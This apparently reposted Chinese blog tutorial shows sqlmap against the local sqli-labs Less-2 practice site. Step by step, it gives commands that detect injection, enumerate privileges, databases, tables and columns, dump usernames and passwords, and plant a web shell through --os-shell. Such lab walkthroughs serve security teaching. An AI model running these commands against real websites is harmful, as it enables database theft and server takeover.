使用sqlmap进行MySQL数据库的注入,sqlmap工具使用,sqlmap的参数详解

时间:2021-05-24 01:08:16   收藏:0   阅读:0

环境

本次注入中我们使用sqli-labs的less-2作为测试网站

使用sqlmap进行MySQL数据库的注入

检测是否存在注入

python sqlmap.py -u http://localhost/sqli-labs/Less-2/index.php?id=1

技术图片

显示payload详细信息

python sqlmap.py -u http://localhost/sqli-labs/Less-2/index.php?id=1 -v 3

技术图片

当前数据库用户是否是高权限用户

python sqlmap.py -u http://localhost/sqli-labs/Less-2/index.php?id=1 --is-dba

技术图片

查看当前用户的权限

python sqlmap.py -u http://localhost/sqli-labs/Less-2/index.php?id=1 --privileges

技术图片

爆数据库

python sqlmap.py -u http://localhost/sqli-labs/Less-2/index.php?id=1 --dbs

技术图片

爆当前数据库

python sqlmap.py -u http://localhost/sqli-labs/Less-2/index.php?id=1 --current-db

技术图片

爆所有数据库的所有表(比较慢,因为所有数据库中的表太多了)

python sqlmap.py -u http://localhost/sqli-labs/Less-2/index.php?id=1 --tables

技术图片

爆指定数据库的所有表

python sqlmap.py -u http://localhost/sqli-labs/Less-2/index.php?id=1 -tables -D security

技术图片

爆指定表的所有列

python sqlmap.py -u http://localhost/sqli-labs/Less-2/index.php?id=1 -columns -T users -D security

技术图片

爆指定列的指定字段

python sqlmap.py -u http://localhost/sqli-labs/Less-2/index.php?id=1 -dump -C id,username,password -T users -D security

技术图片

sqlmap写入shell

python sqlmap.py -u http://localhost/sqli-labs/Less-2/index.php?id=1 --os-shell

这里我们是php的环境,我们选择4

技术图片

这里我们选择2,自定义路径

技术图片

选择接受标准输出

技术图片

我们的文件夹中出现了写入的shell

技术图片

参考博客

评论(0
© 2014 mamicode.com 版权所有 京ICP备13008772号-2  联系我们:gaon5@hotmail.com
迷上了代码!